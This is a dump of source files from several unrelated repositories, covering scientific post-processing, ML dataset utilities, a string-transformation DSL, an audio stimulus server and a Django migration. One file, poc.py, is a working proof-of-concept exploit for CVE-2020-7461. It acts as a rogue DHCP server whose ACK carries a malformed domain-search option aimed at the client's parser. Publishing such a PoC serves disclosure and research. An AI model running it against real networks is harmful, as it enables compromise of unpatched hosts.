| max_stars_repo_path (string, 3-269 chars) | max_stars_repo_name (string, 4-119 chars) | max_stars_count (int64, 0-191k) | id (string, 1-7 chars) | content (string, 6-1.05M chars) | score (float64, 0.23-5.13) | int_score (int64, 0-5) |
|---|---|---|---|---|---|---|
| Cylinder/input_files/pp.py | marchdf/turbulent-cylinder | 0 | 12775551 |
<reponame>marchdf/turbulent-cylinder<filename>Cylinder/input_files/pp.py
# ========================================================================
#
# Imports
#
# ========================================================================
import argparse
import os
import numpy as np
import scipy.spatial.qhull as qhull
import pandas as pd
from mpi4py import MPI
import stk
# ========================================================================
#
# Functions
#
# ========================================================================
def p0_printer(par):
iproc = par.rank
def printer(*args, **kwargs):
if iproc == 0:
print(*args, **kwargs)
return printer
# ========================================================================
#
# Main
#
# ========================================================================
if __name__ == "__main__":
# Parse arguments
parser = argparse.ArgumentParser(description="A simple post-processing tool")
parser.add_argument(
"-m",
"--mfile",
help="Root name of files to postprocess",
required=True,
type=str,
)
parser.add_argument("--auto_decomp", help="Auto-decomposition", action="store_true")
parser.add_argument(
"--navg", help="Number of times to average", default=1, type=int
)
args = parser.parse_args()
fdir = os.path.dirname(args.mfile)
comm = MPI.COMM_WORLD
size = comm.Get_size()
rank = comm.Get_rank()
par = stk.Parallel.initialize()
printer = p0_printer(par)
mesh = stk.StkMesh(par)
printer("Reading meta data for mesh: ", args.mfile)
mesh.read_mesh_meta_data(args.mfile, auto_decomp=args.auto_decomp)
printer("Done reading meta data")
printer("Loading bulk data for mesh: ", args.mfile)
mesh.populate_bulk_data()
printer("Done reading bulk data")
num_time_steps = mesh.stkio.num_time_steps
max_time = mesh.stkio.max_time
tsteps = np.array(mesh.stkio.time_steps)
printer(f"""Num. time steps = {num_time_steps}\nMax. time step = {max_time}""")
# Figure out the times over which to average
tavg = tsteps[-args.navg :]
printer("Averaging the following steps:")
printer(tavg)
# Extract time and spanwise average tau_wall on cylinder
cyl_data = None
for tstep in tavg:
ftime, missing = mesh.stkio.read_defined_input_fields(tstep)
printer(f"Loading tau_wall fields for time: {ftime}")
coords = mesh.meta.coordinate_field
wall = mesh.meta.get_part("cylinder")
sel = wall & mesh.meta.locally_owned_part
tauw = mesh.meta.get_field("tau_wall")
pressure = mesh.meta.get_field("pressure")
names = ["x", "y", "z", "tauw", "pressure"]
nnodes = sum(bkt.size for bkt in mesh.iter_buckets(sel, stk.StkRank.NODE_RANK))
cnt = 0
data = np.zeros((nnodes, len(names)))
for bkt in mesh.iter_buckets(sel, stk.StkRank.NODE_RANK):
xyz = coords.bkt_view(bkt)
tw = tauw.bkt_view(bkt)
p = pressure.bkt_view(bkt)
data[cnt : cnt + bkt.size, :] = np.hstack(
(xyz, tw.reshape(-1, 1), p.reshape(-1, 1))
)
cnt += bkt.size
if cyl_data is None:
cyl_data = np.zeros(data.shape)
cyl_data += data / len(tavg)
lst = comm.gather(cyl_data, root=0)
comm.Barrier()
if rank == 0:
df = pd.DataFrame(np.vstack(lst), columns=names)
cyl = df.groupby("x", as_index=False).mean().sort_values(by=["x"])
cyl["r"] = np.sqrt(cyl.x ** 2 + cyl.y ** 2)
cyl["theta"] = (np.arctan2(cyl.x, cyl.y) + np.pi * 0.5) * 180 / np.pi
cylname = os.path.join(fdir, "cyl.dat")
cyl.to_csv(cylname, index=False)
| 2.21875 | 2 |
| tests/r/test_engel.py | hajime9652/observations | 199 | 12775552 |
<reponame>hajime9652/observations<gh_stars>100-1000
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import shutil
import sys
import tempfile
from observations.r.engel import engel
def test_engel():
"""Test module engel.py by downloading
engel.csv and testing shape of
extracted data has 235 rows and 2 columns
"""
test_path = tempfile.mkdtemp()
x_train, metadata = engel(test_path)
try:
assert x_train.shape == (235, 2)
except:
shutil.rmtree(test_path)
raise
| 2.5 | 2 |
| evaluation/metrics/metric_getters.py | adinawilliams/dynabench | 15 | 12775553 |
# Copyright (c) Facebook, Inc. and its affiliates.
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import yaml
from metrics.instance_property import instance_property
from metrics.metrics_dicts import (
delta_metrics_dict,
eval_metrics_dict,
job_metrics_dict,
metrics_meta_dict,
)
def get_eval_metrics(task, predictions: list, targets: list) -> tuple:
perf_metric_type = yaml.load(task.config_yaml, yaml.SafeLoader)["perf_metric"][
"type"
]
# NOTE:
# right now, the returned eval metric scores are just the perf metric, but we
# could add a feature that allows for the display of multiple eval metrics
metric_result = eval_metrics_dict[perf_metric_type](predictions, targets)
if isinstance(metric_result, dict):
score_dict = metric_result
else:
score_dict = {perf_metric_type: metric_result}
return score_dict[perf_metric_type], score_dict
def get_job_metrics(job, dataset, decen=False) -> dict:
if not job.aws_metrics:
return {}
instance_config = instance_property[dataset.task.instance_type]
job_metrics = instance_config["aws_metrics"]
return_dict = {}
for key in job_metrics:
if key == "examples_per_second":
return_dict[key] = job_metrics_dict[key](job, dataset, decen=decen)
else:
return_dict[key] = job_metrics_dict[key](job, dataset)
return return_dict
def get_delta_metrics(
task, predictions: list, targets: list, perturb_prefix: str
) -> dict:
"""
predictions: a list of list of predictions
targets: a list of labels
"""
perf_metric_type = yaml.load(task.config_yaml, yaml.SafeLoader)["perf_metric"][
"type"
]
perf_metric = eval_metrics_dict[perf_metric_type]
delta_metrics_scores = {
perturb_prefix: delta_metrics_dict[perturb_prefix](
predictions, targets, perf_metric
)
}
return delta_metrics_scores
def get_task_metrics_meta(task):
instance_config = instance_property[task.instance_type]
task_config = yaml.load(task.config_yaml, yaml.SafeLoader)
perf_metric_type = task_config["perf_metric"]["type"]
delta_metric_types = [obj["type"] for obj in task_config.get("delta_metrics", [])]
aws_metric_names = instance_config["aws_metrics"]
# TODO: make it possible to display some models with aws metrics and some
# models without aws metrics on the same leaderboard?
if task.has_predictions_upload or "train_file_metric" in task_config:
aws_metric_names = []
ordered_metric_field_names = (
[perf_metric_type] + aws_metric_names + delta_metric_types
)
metrics_meta = {
metric: metrics_meta_dict.get(metric, metrics_meta_dict[perf_metric_type])(task)
for metric in ordered_metric_field_names
}
return metrics_meta, ordered_metric_field_names
| 2.234375 | 2 |
| latent_programmer/tasks/robust_fill/dsl.py | shaun95/google-research | 1 | 12775554 |
# coding=utf-8
# Copyright 2022 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Defines DSL for the RobustFill domain."""
import abc
import collections
import enum
import functools
import inspect
import re
import string
from typing import TypeVar, List, Dict, Tuple, Any, Optional
ProgramTask = collections.namedtuple('ProgramTask',
['program', 'inputs', 'outputs'])
# Describes range of possible indices for a character (for SubStr expression).
POSITION = [-100, 100]
# Describes range of possible indices for a regex.
INDEX = [-5, -4, -3, -2, -1, 1, 2, 3, 4, 5]
DELIMITER = '&,.?!@()[]%{}/:;$#"\' '
CHARACTER = string.ascii_letters + string.digits + DELIMITER
BOS = 'BOS'
EOS = 'EOS'
class Type(enum.Enum):
NUMBER = 1
WORD = 2
ALPHANUM = 3
ALL_CAPS = 4
PROP_CASE = 5
LOWER = 6
DIGIT = 7
CHAR = 8
class Case(enum.Enum):
PROPER = 1
ALL_CAPS = 2
LOWER = 3
class Boundary(enum.Enum):
START = 1
END = 2
Regex = TypeVar('Regex', Type, str)
def regex_for_type(t):
"""Map types to their regex string."""
if t == Type.NUMBER:
return '[0-9]+'
elif t == Type.WORD:
return '[A-Za-z]+'
elif t == Type.ALPHANUM:
return '[A-Za-z0-9]+'
elif t == Type.ALL_CAPS:
return '[A-Z]+'
elif t == Type.PROP_CASE:
return '[A-Z][a-z]+'
elif t == Type.LOWER:
return '[a-z]+'
elif t == Type.DIGIT:
return '[0-9]'
elif t == Type.CHAR:
return '[A-Za-z0-9' + ''.join([re.escape(x) for x in DELIMITER]) + ']'
else:
raise ValueError('Unsupported type: {}'.format(t))
def match_regex_substr(t, value):
regex = regex_for_type(t)
return re.findall(regex, value)
def match_regex_span(r, value):
if isinstance(r, Type):
regex = regex_for_type(r)
else:
assert (len(r) == 1) and (r in DELIMITER)
regex = '[' + re.escape(r) + ']'
return [match.span() for match in re.finditer(regex, value)]
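# Illustrative sketch: how the two regex helpers above behave on a small input.
# The expected values follow directly from the patterns in regex_for_type.
_example_value = 'ab 12 cd 345'
assert match_regex_substr(Type.NUMBER, _example_value) == ['12', '345']
assert match_regex_span(Type.WORD, _example_value) == [(0, 2), (6, 8)]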
class Base(abc.ABC):
"""Base class for DSL."""
@abc.abstractmethod
def __call__(self, value):
raise NotImplementedError
@abc.abstractmethod
def to_string(self):
raise NotImplementedError
def __repr__(self):
return self.to_string()
@abc.abstractmethod
def encode(self, token_id_table):
raise NotImplementedError
class Program(Base):
pass
class Concat(Program):
"""Concatenation of expressions."""
def __init__(self, *args):
self.expressions = args
def __call__(self, value):
return ''.join([e(value) for e in self.expressions])
def to_string(self):
return ' | '.join([e.to_string() for e in self.expressions])
def encode(self, token_id_table):
sub_token_ids = [e.encode(token_id_table) for e in self.expressions]
return (functools.reduce(lambda a, b: a + b, sub_token_ids)
+ [token_id_table[EOS]])
class Expression(Base):
pass
class Substring(Expression):
pass
class Modification(Expression):
pass
class Compose(Expression):
"""Composition of two modifications or modification and substring."""
def __init__(self, modification,
modification_or_substring):
self.modification = modification
self.modification_or_substring = modification_or_substring
def __call__(self, value):
return self.modification(self.modification_or_substring(value))
def to_string(self):
return (self.modification.to_string() + '('
+ self.modification_or_substring.to_string() + ')')
def encode(self, token_id_table):
return ([token_id_table[self.__class__]]
+ self.modification.encode(token_id_table)
+ self.modification_or_substring.encode(token_id_table))
class ConstStr(Expression):
"""Fixed character."""
def __init__(self, char):
self.char = char
def __call__(self, value):
return self.char
def to_string(self):
return 'Const(' + self.char + ')'
def encode(self, token_id_table):
return [token_id_table[self.__class__], token_id_table[self.char]]
class SubStr(Substring):
"""Return substring given indices."""
def __init__(self, pos1, pos2):
self.pos1 = pos1
self.pos2 = pos2
def __call__(self, value):
# Positive indices start at 1.
p1 = self.pos1 - 1 if self.pos1 > 0 else len(value) + self.pos1
p2 = self.pos2 - 1 if self.pos2 > 0 else len(value) + self.pos2
if p1 >= p2: # Handle edge cases.
return ''
if p2 == len(value):
return value[p1:]
return value[p1:p2 + 1]
def to_string(self):
return 'SubStr(' + str(self.pos1) + ', ' + str(self.pos2) + ')'
def encode(self, token_id_table):
return [
token_id_table[self.__class__],
token_id_table[self.pos1],
token_id_table[self.pos2],
]
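# Illustrative sketch: SubStr uses 1-based positive indices, Python-style
# negative indices, and treats both endpoints as inclusive.
assert SubStr(2, 4)('abcdef') == 'bcd'
assert SubStr(-3, -1)('abcdef') == 'def'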
class GetSpan(Substring):
"""Return substring given indices of regex matches."""
def __init__(self, regex1, index1, bound1,
regex2, index2, bound2):
self.regex1 = regex1
self.index1 = index1
self.bound1 = bound1
self.regex2 = regex2
self.index2 = index2
self.bound2 = bound2
@staticmethod
def _index(r, index, bound,
value):
"""Get index in string of regex match."""
matches = match_regex_span(r, value)
# Positive indices start at 1.
index = index - 1 if index > 0 else len(matches) + index
if not matches:
return -1
if index >= len(matches): # Handle edge cases.
return len(matches) - 1
if index < 0:
return 0
span = matches[index]
return span[0] if bound == Boundary.START else span[1]
def __call__(self, value):
p1 = GetSpan._index(self.regex1, self.index1, self.bound1, value)
p2 = GetSpan._index(self.regex2, self.index2, self.bound2, value)
if min(p1, p2) < 0: # pytype: disable=unsupported-operands
return ''
return value[p1:p2]
def to_string(self):
return ('GetSpan('
+ ', '.join(map(str, [self.regex1,
self.index1,
self.bound1,
self.regex2,
self.index2,
self.bound2]))
+ ')')
def encode(self, token_id_table):
return list(map(lambda x: token_id_table[x],
[self.__class__,
self.regex1,
self.index1,
self.bound1,
self.regex2,
self.index2,
self.bound2]))
class GetToken(Substring):
"""Get regex match."""
def __init__(self, regex_type, index):
self.regex_type = regex_type
self.index = index
def __call__(self, value):
matches = match_regex_substr(self.regex_type, value)
# Positive indices start at 1.
index = self.index - 1 if self.index > 0 else len(matches) + self.index
if not matches:
return ''
if index >= len(matches) or index < 0: # Handle edge cases.
return ''
return matches[index]
def to_string(self):
return 'GetToken_' + str(self.regex_type) + '_' + str(self.index)
def encode(self, token_id_table):
return [
token_id_table[self.__class__],
token_id_table[self.regex_type],
token_id_table[self.index],
]
class ToCase(Modification):
"""Convert to case."""
def __init__(self, case):
self.case = case
def __call__(self, value):
if self.case == Case.PROPER:
return value.capitalize()
elif self.case == Case.ALL_CAPS:
return value.upper()
elif self.case == Case.LOWER:
return value.lower()
else:
raise ValueError('Invalid case: {}'.format(self.case))
def to_string(self):
return 'ToCase_' + str(self.case)
def encode(self, token_id_table):
return [token_id_table[self.__class__], token_id_table[self.case]]
class Replace(Modification):
"""Replace delimitors."""
def __init__(self, delim1, delim2):
self.delim1 = delim1
self.delim2 = delim2
def __call__(self, value):
return value.replace(self.delim1, self.delim2)
def to_string(self):
return 'Replace_' + str(self.delim1) + '_' + str(self.delim2)
def encode(self, token_id_table):
return [
token_id_table[self.__class__],
token_id_table[self.delim1],
token_id_table[self.delim2],
]
class Trim(Modification):
"""Trim whitspace."""
def __init__(self):
pass
def __call__(self, value):
return value.strip()
def to_string(self):
return 'Trim'
def encode(self, token_id_table):
return [token_id_table[self.__class__]]
class GetUpto(Substring):
"""Get substring up to regex match."""
def __init__(self, regex):
self.regex = regex
def __call__(self, value):
matches = match_regex_span(self.regex, value)
if not matches:
return ''
first = matches[0]
return value[:first[1]]
def to_string(self):
return 'GetUpto_' + str(self.regex)
def encode(self, token_id_table):
return [token_id_table[self.__class__], token_id_table[self.regex]]
class GetFrom(Substring):
"""Get substring from regex match."""
def __init__(self, regex):
self.regex = regex
def __call__(self, value):
matches = match_regex_span(self.regex, value)
if not matches:
return ''
first = matches[0]
return value[first[1]:]
def to_string(self):
return 'GetFrom_' + str(self.regex)
def encode(self, token_id_table):
return [token_id_table[self.__class__], token_id_table[self.regex]]
class GetFirst(Modification):
"""Get first occurrences of regex match."""
def __init__(self, regex_type, index):
self.regex_type = regex_type
self.index = index
def __call__(self, value):
matches = match_regex_substr(self.regex_type, value)
if not matches:
return ''
if self.index >= len(matches):
return ''.join(matches)
return ''.join(matches[:self.index])
def to_string(self):
return 'GetFirst_' + str(self.regex_type) + '_' + str(self.index)
def encode(self, token_id_table):
return [
token_id_table[self.__class__],
token_id_table[self.regex_type],
token_id_table[self.index],
]
class GetAll(Modification):
"""Get all occurrences of regex match."""
def __init__(self, regex_type):
self.regex_type = regex_type
def __call__(self, value):
return ''.join(match_regex_substr(self.regex_type, value))
def to_string(self):
return 'GetAll_' + str(self.regex_type)
def encode(self, token_id_table):
return [token_id_table[self.__class__], token_id_table[self.regex_type]]
# New Functions
# ---------------------------------------------------------------------------
class Substitute(Modification):
"""Replace i-th occurence of regex match with constant."""
def __init__(self, regex_type, index, char):
self.regex_type = regex_type
self.index = index
self.char = char
def __call__(self, value):
matches = match_regex_substr(self.regex_type, value)
# Positive indices start at 1.
index = self.index - 1 if self.index > 0 else len(matches) + self.index
if not matches:
return value
if index >= len(matches) or index < 0: # Handle edge cases.
return value
return value.replace(matches[index], self.char, 1)
def to_string(self):
return ('Substitute_' + str(self.regex_type) + '_' + str(self.index) + '_'
+ self.char)
def encode(self, token_id_table):
return [
token_id_table[self.__class__],
token_id_table[self.regex_type],
token_id_table[self.index],
token_id_table[self.char],
]
class SubstituteAll(Modification):
"""Replace all occurences of regex match with constant."""
def __init__(self, regex_type, char):
self.regex_type = regex_type
self.char = char
def __call__(self, value):
matches = match_regex_substr(self.regex_type, value)
for match in matches:
value = value.replace(match, self.char, 1)
return value
def to_string(self):
return 'SubstituteAll_' + str(self.regex_type) + '_' + self.char
def encode(self, token_id_table):
return [
token_id_table[self.__class__],
token_id_table[self.regex_type],
token_id_table[self.char],
]
class Remove(Modification):
"""Remove i-th occurence of regex match."""
def __init__(self, regex_type, index):
self.regex_type = regex_type
self.index = index
def __call__(self, value):
matches = match_regex_substr(self.regex_type, value)
# Positive indices start at 1.
index = self.index - 1 if self.index > 0 else len(matches) + self.index
if not matches:
return value
if index >= len(matches) or index < 0: # Handle edge cases.
return value
return value.replace(matches[index], '', 1)
def to_string(self):
return 'Remove_' + str(self.regex_type) + '_' + str(self.index)
def encode(self, token_id_table):
return [
token_id_table[self.__class__],
token_id_table[self.regex_type],
token_id_table[self.index],
]
class RemoveAll(Modification):
"""Remove all occurences of regex match."""
def __init__(self, regex_type):
self.regex_type = regex_type
def __call__(self, value):
matches = match_regex_substr(self.regex_type, value)
for match in matches:
value = value.replace(match, '', 1)
return value
def to_string(self):
return 'RemoveAll_' + str(self.regex_type)
def encode(self, token_id_table):
return [
token_id_table[self.__class__],
token_id_table[self.regex_type],
]
def decode_expression(encoding,
id_token_table):
"""Decode sequence of token ids to expression (excluding Compose)."""
cls = id_token_table[encoding[0]]
return cls(*list(map(lambda x: id_token_table[x], encoding[1:])))
def decode_program(encoding,
id_token_table):
"""Decode sequence of token ids into a Concat program."""
expressions = []
idx = 0
while idx < len(encoding) - 1:
elem = id_token_table[encoding[idx]]
if elem == Compose: # Handle Compose separately.
idx += 1
modification_elem = id_token_table[encoding[idx]]
n_args = len(inspect.signature(modification_elem.__init__).parameters)
modification = decode_expression(encoding[idx:idx+n_args], id_token_table)
idx += n_args
modification_or_substring_elem = id_token_table[encoding[idx]]
n_args = len(
inspect.signature(modification_or_substring_elem.__init__).parameters)
modification_or_substring = decode_expression(encoding[idx:idx+n_args],
id_token_table)
idx += n_args
next_e = Compose(modification, modification_or_substring)
else:
n_args = len(inspect.signature(elem.__init__).parameters)
next_e = decode_expression(encoding[idx:idx+n_args], id_token_table)
idx += n_args
expressions.append(next_e)
assert id_token_table[encoding[idx]] == EOS
return Concat(*expressions)
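# Illustrative sketch: composing a small program from the DSL above. GetToken
# selects the first and second words, Compose applies a case modification to
# each, and Concat joins the pieces.
_demo_program = Concat(
    Compose(ToCase(Case.PROPER), GetToken(Type.WORD, 1)),
    ConstStr(' '),
    Compose(ToCase(Case.ALL_CAPS), GetToken(Type.WORD, 2)))
assert _demo_program('hello world') == 'Hello WORLD'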
| 2.90625 | 3 |
| flystim/flystim/audio.py | ClandininLab/multistim | 0 | 12775555 |
<reponame>ClandininLab/multistim
import sys
import pyaudio
from time import sleep, time
import numpy as np
from flyrpc.transceiver import MySocketServer
from flyrpc.util import get_kwargs
def sine_song(sr, volume=1.0, duration=1.0, freq=225.0):
t = np.linspace(0, duration, round(duration * sr))
samples = volume * np.sin(2 * np.pi * freq * t)
return np.floor(samples*2**15).astype(np.int16)
def pulse_song(sr, volume=1.0, duration=1.0, freq=125.0, pcycle=0.016, ncycle=0.020):
cycles = round(duration/(pcycle + ncycle))
sigm = pcycle / 4
K = 0.5 * sigm ** 2
seg = (pcycle + ncycle) * sr
seg = int(seg)
t = np.linspace(0, (seg - 1) / sr, seg)
t = t - np.mean(t)
y = np.exp(-t ** 2 / K) * np.cos(2 * np.pi * freq * t)
samples = np.zeros(seg * cycles)
for i in range(cycles):
samples[seg * i:seg * (i + 1)] = y
samples = np.delete(samples, slice(0, int(seg / 4)))
samples = volume * samples
return np.floor(samples * 2 ** 15).astype(np.int16)
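# Illustrative sketch: both generators return int16 buffers suitable for a
# 16-bit mono stream; at 44.1 kHz a one-second sine song holds 44100 samples.
_demo_sr = 44100
_demo_song = sine_song(_demo_sr, volume=0.5, duration=1.0, freq=225.0)
assert _demo_song.dtype == np.int16 and len(_demo_song) == _demo_sr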
class AudioPlay:
def __init__(self, sample_rate=44100):
self.sr = sample_rate
self.speaker = pyaudio.PyAudio()
self.soundTrack = None
self.stream = None
def __del__(self):
self.speaker.terminate()
def load_stim(self, name, **kwargs):
stim = getattr(sys.modules[__name__], name)
kwargs['sr'] = self.sr
self.soundTrack = stim(**kwargs)
self.stream = self.speaker.open(format=pyaudio.paInt16,
channels=1,
rate=self.sr,
output=True)
def start_stim(self):
print('command executed to speaker at %s' % time())
if (self.soundTrack is not None) and (len(self.soundTrack) > 0):
self.stream.write(self.soundTrack, num_frames=len(self.soundTrack))
def stop_stim(self):
self.soundTrack = None
self.stream.stop_stream()
self.stream.close()
def main():
# get the configuration parameters
kwargs = get_kwargs()
# launch the server
server = MySocketServer(host=kwargs['host'], port=kwargs['port'], threaded=True, auto_stop=True, name='speaker')
# launch application
audio = AudioPlay(sample_rate=44100)
# register functions
server.register_function(audio.load_stim)
server.register_function(audio.start_stim)
server.register_function(audio.stop_stim)
while True:
server.process_queue()
if __name__ == '__main__':
main()
| 2.40625 | 2 |
| schedule/migrations/0003_auto_20160715_0028.py | PicaMirum/django-scheduler | 4 | 12775556 |
<filename>schedule/migrations/0003_auto_20160715_0028.py
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('schedule', '0002_event_color_event'),
]
operations = [
migrations.AlterField(
model_name='event',
name='end',
field=models.DateTimeField(help_text='The end time must be later than the start time.', verbose_name='end', db_index=True),
),
migrations.AlterField(
model_name='event',
name='end_recurring_period',
field=models.DateTimeField(help_text='This date is ignored for one time only events.', null=True, verbose_name='end recurring period', db_index=True, blank=True),
),
migrations.AlterField(
model_name='event',
name='start',
field=models.DateTimeField(verbose_name='start', db_index=True),
),
migrations.AlterField(
model_name='occurrence',
name='end',
field=models.DateTimeField(verbose_name='end', db_index=True),
),
migrations.AlterField(
model_name='occurrence',
name='start',
field=models.DateTimeField(verbose_name='start', db_index=True),
),
migrations.AlterIndexTogether(
name='event',
index_together=set([('start', 'end')]),
),
migrations.AlterIndexTogether(
name='occurrence',
index_together=set([('start', 'end')]),
),
]
| 1.765625 | 2 |
| poc.py | knqyf263/CVE-2020-7461 | 12 | 12775557 |
#!/usr/bin/python
from scapy.all import *
import binascii
src_mac = "[YOUR_MAC_ADDR]"
dst_addr = "192.168.33.123"
src_addr = "192.168.33.11"
gateway = "192.168.33.1"
subnet_mask = "255.255.255.0"
iface = "[YOUR_INTERFACE]"
filter = "udp port 67"
def handle_packet(packet):
eth = packet.getlayer(Ether)
ip = packet.getlayer(IP)
udp = packet.getlayer(UDP)
bootp = packet.getlayer(BOOTP)
dhcp = packet.getlayer(DHCP)
dhcp_message_type = None
if not dhcp:
return False
for opt in dhcp.options:
if opt[0] == "message-type":
dhcp_message_type = opt[1]
# DHCP Discover (message-type 1) received: reply with an Offer
if dhcp_message_type == 1:
chaddr = binascii.unhexlify(eth.src.replace(":", ""))
ethernet = Ether(dst=eth.src, src=src_mac)
ip = IP(dst=dst_addr, src=src_addr)
udp = UDP(sport=udp.dport, dport=udp.sport)
bootp = BOOTP(
op="BOOTREPLY",
yiaddr=dst_addr,
siaddr=gateway,
chaddr=chaddr,
xid=bootp.xid,
)
dhcp = DHCP(
options=[
("message-type", "offer"),
("server_id", src_addr),
("subnet_mask", subnet_mask),
("end"),
]
)
ack = ethernet / ip / udp / bootp / dhcp
sendp(ack, iface=iface)
# DHCP Request (message-type 3) received: reply with an ACK
elif dhcp_message_type == 3:
chaddr = binascii.unhexlify(eth.src.replace(":", ""))
ethernet = Ether(dst=eth.src, src=src_mac)
ip = IP(dst=dst_addr, src=src_addr)
udp = UDP(sport=udp.dport, dport=udp.sport)
bootp = BOOTP(
op="BOOTREPLY",
yiaddr=dst_addr,
siaddr=gateway,
chaddr=chaddr,
xid=bootp.xid,
)
dhcp = DHCP(
options=[
("message-type", "ack"),
("server_id", src_addr),
("lease_time", 43200),
("subnet_mask", subnet_mask),
(
119,
b"\x02\xc0\x01\x00\x01\x41\xc0\x01",
),
("end"),
]
)
ack = ethernet / ip / udp / bootp / dhcp
sendp(ack, iface=iface)
print("Sniffing...")
sniff(iface=iface, filter=filter, prn=handle_packet)
| 2.5625 | 3 |
| Session 05 - Functions/importexample.py | boragungoren-portakalteknoloji/METU-BA4318-Fall2018 | 0 | 12775558 |
import mysamplefunctions
variable = -5
print("variable is:", variable)
abs = mysamplefunctions.absolute(variable)
print ("absolute value is:", abs)
from mysamplefunctions import areatriangle
w = 5
h = 10
print("area is:", areatriangle(width=w, height=h) )
from mysamplefunctions import areacircle, summation
radius = 10
area1 = areacircle(radius)
area2 = areacircle(radius, 3)
area3 = areacircle(radius, pi = 3.14)
print("area1: ", area1, "area2: ", area2, "area3: ", area3)
total1 = summation (1,2,3,4,5)
print("total1:", total1)
from mysamplefunctions import *
mynumbers = [1,2,3,4,5]
total3 = sumbylist (mynumbers)
print("total3:", total3)
total4 = summation (1,2,3,4,5)
print("total4:", total4)
| 3.65625 | 4 |
| tdrn2cartucho.py | KenYu910645/mAP | 0 | 12775559 |
<reponame>KenYu910645/mAP<filename>tdrn2cartucho.py<gh_stars>0
# This code converts result.txt to input/detection-results/
# result.txt is the yolov4 model detection output file
input_result_path = "/Users/lucky/Desktop/VOC07/-1_VOC0712_test/results/"
input_annoated_path = "/Users/lucky/Desktop/VOCdevkit/VOC2007/Annotations/"
image_path = "/Users/lucky/Desktop/VOCdevkit/VOC2007/JPEGImages/"
output_dir_path = "/Users/lucky/Desktop/mAP/tdrn_result_image/"
import pprint
import os
from collections import defaultdict
THRES = 0.5
# Get result_dic from detection results
file_list = os.listdir(input_result_path)
result_dic = defaultdict(list)
for file_name in file_list:
class_name = file_name.split('_')[-1].split('.')[0]
# print(class_name)
with open(input_result_path + file_name) as f:
for line in f: # 000067 0.999 45.2 73.2 448.5 212.3
image_num, conf, x1, y1, x2, y2 = line.split()# [000067, 0.999, 45.2, 73.2, 448.5, 212.3]
result_dic[image_num].append((class_name, float(conf), float(x1), float(y1), float(x2), float(y2)))
# print(result_dic)
print("Done reading detection results ")
import xml.etree.ElementTree as ET
for img_num in result_dic:
tree = ET.parse(input_annoated_path + img_num + ".xml")
root = tree.getroot()
for obj in root.findall('object'):
class_name = obj.find('name').text
bb = obj.find('bndbox')
result_dic[img_num].append((class_name, "annotate", bb[0].text, bb[1].text, bb[2].text, bb[3].text))
print("Done reading annatation data")
import cv2
# draw image
for i, img_num in enumerate(result_dic):
img = cv2.imread(image_path + img_num + ".jpg")
for det in result_dic[img_num]:
class_name = det[0]
conf = det[1]
if conf == "annotate":
cv2.rectangle(img,
(int(det[2]), int(det[3])),
(int(det[4]), int(det[5])),
(0, 255, 0),
2)
else:
if conf > THRES:
cv2.rectangle(img,
(int(det[2]), int(det[3])),
(int(det[4]), int(det[5])),
(0, 0, 255),
2)
cv2.putText(img,
class_name + " " + str(round(conf, 2)),
(int(det[2]), int(det[3])),
cv2.FONT_HERSHEY_SIMPLEX,
1, (0, 0, 255), 2, cv2.LINE_AA)
cv2.imwrite(output_dir_path + img_num + ".jpg", img)
print(str(i) + " / " + str(len(result_dic)))
| 2.484375 | 2 |
| mml/data/adult/adult.py | feedbackward/mml | 0 | 12775560 |
'''H5 data prep'''
## External modules.
import csv
import numpy as np
import os
import tables
## Internal modules.
from mml.config import dir_data_toread
from mml.config import dir_data_towrite
from mml.utils import makedir_safe
###############################################################################
## Clerical setup.
data_name = "adult"
toread_tr = os.path.join(dir_data_toread, data_name, "adult.data")
toread_te = os.path.join(dir_data_toread, data_name, "adult.test")
newdir = os.path.join(dir_data_towrite, data_name)
towrite = os.path.join(newdir, "adult.h5")
attribute_names = [
"age", "workclass", "fnlwgt", "education", "education-num",
"marital-status", "occupation", "relationship", "race", "sex",
"capital-gain", "capital-loss", "hours-per-week", "native-country"
] # order is important.
attribute_dict = {
"age": ["continuous"],
"workclass": ["Private", "Self-emp-not-inc", "Self-emp-inc",
"Federal-gov", "Local-gov", "State-gov",
"Without-pay", "Never-worked"],
"fnlwgt": ["continuous"],
"education": ["Bachelors", "Some-college", "11th", "HS-grad",
"Prof-school", "Assoc-acdm", "Assoc-voc", "9th",
"7th-8th", "12th", "Masters", "1st-4th", "10th",
"Doctorate", "5th-6th", "Preschool"],
"education-num": ["continuous"],
"marital-status": ["Married-civ-spouse", "Divorced",
"Never-married", "Separated", "Widowed",
"Married-spouse-absent", "Married-AF-spouse"],
"occupation": ["Tech-support", "Craft-repair", "Other-service",
"Sales", "Exec-managerial", "Prof-specialty",
"Handlers-cleaners", "Machine-op-inspct",
"Adm-clerical", "Farming-fishing",
"Transport-moving", "Priv-house-serv",
"Protective-serv", "Armed-Forces"],
"relationship": ["Wife", "Own-child", "Husband", "Not-in-family",
"Other-relative", "Unmarried"],
"race": ["White", "Asian-Pac-Islander", "Amer-Indian-Eskimo",
"Other", "Black"],
"sex": ["Female", "Male"],
"capital-gain": ["continuous"],
"capital-loss": ["continuous"],
"hours-per-week": ["continuous"],
"native-country": ["United-States", "Cambodia", "England",
"Puerto-Rico", "Canada", "Germany",
"Outlying-US(Guam-USVI-etc)", "India",
"Japan", "Greece", "South", "China", "Cuba",
"Iran", "Honduras", "Philippines", "Italy",
"Poland", "Jamaica", "Vietnam", "Mexico",
"Portugal", "Ireland", "France",
"Dominican-Republic", "Laos", "Ecuador",
"Taiwan", "Haiti", "Columbia", "Hungary",
"Guatemala", "Nicaragua", "Scotland",
"Thailand", "Yugoslavia", "El-Salvador",
"Trinadad&Tobago", "Peru", "Hong",
"Holand-Netherlands"]
}
label_dict = {"<=50K": 0,
">50K": 1}
n_tr = 30162 # number of clean instances.
n_te = 15060 # number of clean instances.
n_all = n_tr+n_te
num_features = np.array(
[ len(attribute_dict[key]) for key in attribute_dict.keys() ]
).sum() # number of features after a one-hot encoding.
num_classes = 2
num_labels = 1
title = data_name+": Full dataset"
title_X = data_name+": Features"
